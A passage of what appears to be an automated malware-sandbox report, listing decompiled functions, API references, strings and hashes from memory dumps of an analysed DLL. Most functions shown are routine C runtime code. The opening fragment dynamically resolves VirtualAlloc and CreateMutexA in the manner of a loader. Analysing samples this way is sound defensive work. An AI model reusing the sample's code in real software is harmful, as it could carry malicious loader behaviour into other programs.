					 *0x6f34606c = GetProcAddress(_t30, _t24);
					_t32 = _t30;
					_t33 = GetProcAddress(_t32,  &_v17);
					"@Mxt7ce3e80173264ea19b05306b865eadf9" = _t33;
					return _t33;
				}
				return _t26;
			}

0x6f30130b
0x6f301312
0x6f301319
0x6f30131d
0x6f301324
0x6f30132b
0x6f301332
0x6f301336
0x6f30133d
0x6f301344
0x6f30134a
0x6f30134e
0x6f301352
0x6f301359
0x6f301360
0x6f301367
0x6f30136b
0x6f301372
0x6f301379
0x6f301380
0x6f301384
0x6f301388
0x6f301390
0x6f301393
0x6f30139e
0x6f3013a3
0x6f3013a5
0x6f3013b0
0x6f3013b5
0x6f3013b7
0x6f3013c2
0x6f3013c7
0x6f3013cd
0x6f3013d3
0x00000000
0x6f3013d3
0x6f3013d9

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F301388
GetProcAddress.KERNEL32(00000000,VirtualAlloc), ref: 6F301398
GetProcAddress.KERNEL32(6E72656B,VirtualFreCreateMutexA), ref: 6F3013AA
GetProcAddress.KERNEL32(32336C65,CreateMutexA), ref: 6F3013BC
GetProcAddress.KERNEL32(00000000,4C746547), ref: 6F3013CD

Strings

astE, xrefs: 6F301372
GetL, xrefs: 6F30136B
VirtualFreCreateMutexA, xrefs: 6F3013A5, 6F3013A8
kernel32, xrefs: 6F301384, 6F301387
@Mxt7ce3e80173264ea19b05306b865eadf9, xrefs: 6F3013D3
VirtualAlloc, xrefs: 6F301393, 6F301396
rror, xrefs: 6F301379
texA, xrefs: 6F301360

Memory Dump Source

Source File: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: @Mxt7ce3e80173264ea19b05306b865eadf9$GetL$VirtualAlloc$VirtualFreCreateMutexA$astE$kernel32$rror$texA
API String ID: 667068680-3237107477
Opcode ID: 24d3dd1265604e6a0067d9b8875a349feb9556da17829d37b22fc0a8d67f6c31
Instruction ID: e9682cdfe1eb16420ce58e19bcd16581c40f7fd5f245901ed2bdafba14830f05
Opcode Fuzzy Hash: 24d3dd1265604e6a0067d9b8875a349feb9556da17829d37b22fc0a8d67f6c31
Instruction Fuzzy Hash: 8D2115B1C08748AEEF01DFE4D548BEEBB79EB46710F10854EE441AA258DB758214CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6F320EF4, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6F320EF4(void* __edx, void* __esi, char _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;
				void* _t72;

				_t72 = __esi;
				_t71 = __edx;
				_t36 = _a4;
				_t67 =  *_a4;
				_t76 = _t67 - 0x6f328a38;
				if(_t67 != 0x6f328a38) {
					E6F31FEFF(_t67);
					_t36 = _a4;
				}
				E6F31FEFF( *((intOrPtr*)(_t36 + 0x3c)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x30)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x34)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x38)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x28)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x2c)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x40)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x44)));
				E6F31FEFF( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6F320D3C( &_v5, _t71, _t76);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6F320D9D( &_v5, _t71, _t72, _t76);
			}

0x6f320ef4
0x6f320ef4
0x6f320ef9
0x6f320eff
0x6f320f01
0x6f320f07
0x6f320f0a
0x6f320f0f
0x6f320f12
0x6f320f16
0x6f320f21
0x6f320f2c
0x6f320f37
0x6f320f42
0x6f320f4d
0x6f320f58
0x6f320f63
0x6f320f71
0x6f320f7c
0x6f320f84
0x6f320f85
0x6f320f88
0x6f320f8e
0x6f320f92
0x6f320f96
0x6f320f97
0x6f320fa1
0x6f320fa7
0x6f320fa8
0x6f320fab
0x6f320fb1
0x6f320fb5
0x6f320fb9
0x6f320fc2

APIs

_free.LIBCMT ref: 6F320F0A

Part of subcall function 6F31FEFF: HeapFree.KERNEL32(00000000,00000000,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?), ref: 6F31FF15
Part of subcall function 6F31FEFF: GetLastError.KERNEL32(?,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?,?), ref: 6F31FF27

_free.LIBCMT ref: 6F320F16
_free.LIBCMT ref: 6F320F21
_free.LIBCMT ref: 6F320F2C
_free.LIBCMT ref: 6F320F37
_free.LIBCMT ref: 6F320F42
_free.LIBCMT ref: 6F320F4D
_free.LIBCMT ref: 6F320F58
_free.LIBCMT ref: 6F320F63
_free.LIBCMT ref: 6F320F71

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e66b538eb7b9fddacba8e90c6e3b21ad69ac8b1c29234bc0aa749b22f560740c
Instruction ID: 24afe4d7194f1c82a9512393139de7b4ce4904a105c3e898f44f498db7adec12
Opcode Fuzzy Hash: e66b538eb7b9fddacba8e90c6e3b21ad69ac8b1c29234bc0aa749b22f560740c
Instruction Fuzzy Hash: 7321EB76904248BFCB05EFA8C880DDE7BB9FF48340F1042A6F5559B661DB31EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F31D3D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6F31D3D0(void* __ebx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr* _t67;
				intOrPtr _t71;
				intOrPtr _t73;
				signed int _t75;
				char _t77;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				void* _t98;
				void* _t101;
				void* _t102;
				void* _t110;

				_t71 = _a8;
				_v5 = 0;
				_t93 = _t71 + 0x10;
				_push(_t93);
				_v16 = 1;
				_v20 = _t93;
				_v12 =  *(_t71 + 8) ^  *0x6f34609c;
				E6F31D390( *(_t71 + 8) ^  *0x6f34609c);
				E6F31D717(_a12);
				_t51 = _a4;
				_t102 = _t101 + 0xc;
				_t90 =  *((intOrPtr*)(_t71 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						E6F31D700(_t71, 0xfffffffe, _t93, 0x6f34609c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t71 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t75 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t73 =  *((intOrPtr*)(_t75 + _t58 * 4));
							_t59 = _t75 + _t58 * 4;
							_t76 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t77 = _v5;
								goto L8;
							} else {
								_t60 = E6F31D6B0(_t76, _t93);
								_t77 = 1;
								_v5 = 1;
								_t110 = _t60;
								if(_t110 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									E6F31D390(_v12);
									goto L15;
								} else {
									if(_t110 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6f328a30;
											if(__eflags != 0) {
												_t67 = E6F326B90(__eflags, 0x6f328a30);
												_t102 = _t102 + 4;
												__eflags = _t67;
												if(_t67 != 0) {
													_t97 =  *0x6f328a30; // 0x6f31e30c
													 *0x6f328124(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t102 = _t102 + 8;
												}
												_t61 = _a4;
											}
										}
										E6F31D6E4(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											E6F31D700(_t63, _t90, _t93, 0x6f34609c);
											_t63 = _a8;
										}
										 *((intOrPtr*)(_t63 + 0xc)) = _t73;
										_t64 = E6F31D390(_v12);
										E6F31D6C8();
										asm("int3");
										__imp__InterlockedFlushSList(_v40, _t98, _t93);
										__eflags = _t64;
										if(_t64 != 0) {
											_push(_t93);
											do {
												_t95 =  *_t64;
												E6F31E93F(_t64);
												_t64 = _t95;
												__eflags = _t95;
											} while (_t95 != 0);
											return _t64;
										}
										return _t64;
									} else {
										goto L8;
									}
								}
							}
							goto L29;
							L8:
							_t90 = _t73;
						} while (_t73 != 0xfffffffe);
						if(_t77 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L29:
			}

0x6f31d3d7
0x6f31d3dc
0x6f31d3e3
0x6f31d3ec
0x6f31d3ee
0x6f31d3f5
0x6f31d3f8
0x6f31d3fb
0x6f31d403
0x6f31d408
0x6f31d40b
0x6f31d40e
0x6f31d415
0x6f31d476
0x6f31d479
0x6f31d488
0x00000000
0x6f31d488
0x00000000
0x6f31d417
0x6f31d417
0x6f31d41d
0x6f31d423
0x6f31d429
0x6f31d499
0x6f31d4a2
0x6f31d42b
0x6f31d430
0x6f31d430
0x6f31d433
0x6f31d436
0x6f31d439
0x6f31d43c
0x6f31d43f
0x6f31d442
0x6f31d447
0x6f31d45d
0x00000000
0x6f31d449
0x6f31d44b
0x6f31d450
0x6f31d452
0x6f31d455
0x6f31d457
0x6f31d46d
0x6f31d48d
0x6f31d48d
0x6f31d491
0x00000000
0x6f31d459
0x6f31d459
0x6f31d4a3
0x6f31d4a6
0x6f31d4ac
0x6f31d4ae
0x6f31d4b5
0x6f31d4bc
0x6f31d4c1
0x6f31d4c4
0x6f31d4c6
0x6f31d4c8
0x6f31d4d5
0x6f31d4db
0x6f31d4dd
0x6f31d4e0
0x6f31d4e0
0x6f31d4e3
0x6f31d4e3
0x6f31d4b5
0x6f31d4eb
0x6f31d4f0
0x6f31d4f3
0x6f31d4f6
0x6f31d502
0x6f31d507
0x6f31d507
0x6f31d50e
0x6f31d511
0x6f31d521
0x6f31d526
0x6f31d52d
0x6f31d533
0x6f31d535
0x6f31d537
0x6f31d538
0x6f31d538
0x6f31d53b
0x6f31d540
0x6f31d543
0x6f31d543
0x00000000
0x6f31d547
0x6f31d549
0x6f31d45b
0x00000000
0x6f31d45b
0x6f31d459
0x6f31d457
0x00000000
0x6f31d460
0x6f31d460
0x6f31d462
0x6f31d469
0x00000000
0x6f31d46b
0x00000000
0x6f31d469
0x6f31d429
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6F31D3FB
___except_validate_context_record.LIBVCRUNTIME ref: 6F31D403
_ValidateLocalCookies.LIBCMT ref: 6F31D491
__IsNonwritableInCurrentImage.LIBCMT ref: 6F31D4BC
_ValidateLocalCookies.LIBCMT ref: 6F31D511

Strings

csm, xrefs: 6F31D4A6

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 7a2f4353a26e4d2891157bfa4f9899e67368188e929fa9b80fa4cd5facc1f2d3
Instruction ID: 563386b0bb7b2424c7243a247b09eb5dc6d4d35707fa8eec393e0e4801ab1b75
Opcode Fuzzy Hash: 7a2f4353a26e4d2891157bfa4f9899e67368188e929fa9b80fa4cd5facc1f2d3
Instruction Fuzzy Hash: DB41AC74D08219ABCF08DF68C84469EBBB6BF47328F108156D8555B391DF36F925CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F320262, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F320262(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6f35e350 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6f328ce8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6F31FE77(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6F31FE77(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6f32026b
0x6f320315
0x6f320273
0x6f320275
0x6f32027c
0x6f32027e
0x6f320284
0x6f320291
0x6f3202a6
0x6f3202aa
0x6f3202fc
0x6f3202fc
0x6f320301
0x6f320305
0x6f320308
0x6f320308
0x6f32030e
0x6f320310
0x6f320327
0x6f320320
0x6f320326
0x6f320326
0x6f320312
0x6f320312
0x00000000
0x6f320312
0x6f3202ac
0x6f3202b5
0x6f3202ec
0x6f3202ec
0x6f3202ee
0x6f3202f0
0x00000000
0x00000000
0x6f3202f8
0x00000000
0x6f3202f8
0x6f3202bf
0x6f3202c4
0x6f3202c9
0x00000000
0x00000000
0x6f3202d3
0x6f3202d8
0x6f3202dd
0x00000000
0x00000000
0x6f3202e2
0x6f3202e8
0x00000000
0x6f3202e8
0x6f320289
0x00000000
0x00000000
0x00000000
0x6f32028f
0x6f32031e
0x00000000

Strings

api-ms-, xrefs: 6F3202B9
ext-ms-, xrefs: 6F3202CD

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: f92dd318ff28e2842fa96d7a19931fb72e1ff01edd9a1d1b85d7e1911c634a9d
Instruction ID: e33a20830f7744555e2560a976f90a5e4d83833e3ff640c494c1f942ed1f48e0
Opcode Fuzzy Hash: f92dd318ff28e2842fa96d7a19931fb72e1ff01edd9a1d1b85d7e1911c634a9d
Instruction Fuzzy Hash: F7215EB1A89324BBDB114A348D90A4E7BECAF06770F202217ED54A7281DB31FD0485F0

Uniqueness

Uniqueness Score: -1.00%

Function 6F3247A7, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3247A7(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6F32476F(_t45, 7);
					E6F32476F(_t45 + 0x1c, 7);
					E6F32476F(_t45 + 0x38, 0xc);
					E6F32476F(_t45 + 0x68, 0xc);
					E6F32476F(_t45 + 0x98, 2);
					E6F31FEFF( *((intOrPtr*)(_t45 + 0xa0)));
					E6F31FEFF( *((intOrPtr*)(_t45 + 0xa4)));
					E6F31FEFF( *((intOrPtr*)(_t45 + 0xa8)));
					E6F32476F(_t45 + 0xb4, 7);
					E6F32476F(_t45 + 0xd0, 7);
					E6F32476F(_t45 + 0xec, 0xc);
					E6F32476F(_t45 + 0x11c, 0xc);
					E6F32476F(_t45 + 0x14c, 2);
					E6F31FEFF( *((intOrPtr*)(_t45 + 0x154)));
					E6F31FEFF( *((intOrPtr*)(_t45 + 0x158)));
					E6F31FEFF( *((intOrPtr*)(_t45 + 0x15c)));
					return E6F31FEFF( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6f3247ad
0x6f3247b2
0x6f3247bb
0x6f3247c6
0x6f3247d1
0x6f3247dc
0x6f3247ea
0x6f3247f5
0x6f324800
0x6f32480b
0x6f324819
0x6f324827
0x6f324838
0x6f324846
0x6f324854
0x6f32485f
0x6f32486a
0x6f324875
0x00000000
0x6f324885
0x6f32488a

APIs

Part of subcall function 6F32476F: _free.LIBCMT ref: 6F324794

_free.LIBCMT ref: 6F3247F5

Part of subcall function 6F31FEFF: HeapFree.KERNEL32(00000000,00000000,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?), ref: 6F31FF15
Part of subcall function 6F31FEFF: GetLastError.KERNEL32(?,?,6F324799,?,00000000,?,00000000,?,6F3247C0,?,00000007,?,?,6F324436,?,?), ref: 6F31FF27

_free.LIBCMT ref: 6F324800
_free.LIBCMT ref: 6F32480B
_free.LIBCMT ref: 6F32485F
_free.LIBCMT ref: 6F32486A
_free.LIBCMT ref: 6F324875
_free.LIBCMT ref: 6F324880

Memory Dump Source

Source File: 00000003.00000002.365879717.000000006F302000.00000020.00020000.sdmp, Offset: 6F300000, based on PE: true

Associated: 00000003.00000002.365857099.000000006F300000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.365866246.000000006F301000.00000080.00020000.sdmp Download File
Associated: 00000003.00000002.365952524.000000006F328000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366031695.000000006F346000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366039956.000000006F347000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.366091558.000000006F35E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.366098078.000000006F361000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ef2c806dc7946e275d41aea7e72c5aba1546200829dff6b1409bfec46ce686fb
Instruction ID: fb74bd41959d981bee1d905a02cf767080abf599167a47211556da31202b9b04
Opcode Fuzzy Hash: ef2c806dc7946e275d41aea7e72c5aba1546200829dff6b1409bfec46ce686fb
Instruction Fuzzy Hash: E0118B31944B48EBD620EBB4CD05FCF77DDAF82744F400925B2FAA61D2EB35B50586A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F32312B, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E6F32312B(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0x6f34609c; // 0x206de7d6
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_v80 = _t282;
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 +  *((intOrPtr*)(0x6f35e428 + _t246 * 4)) + 0x18));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E6F31EA98( &_v72, _t263, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x6f35e428 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0x6f3467f0)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0x6f35e428 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0x6f3467f0)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0x6f35e428 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E6F31DD40( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0x6f35e428 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E6F324104(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E6F3227A9(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E6F322E16(_t264);
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0x6f35e428 + _t271 * 4)) + 0x2e)) = _v33;
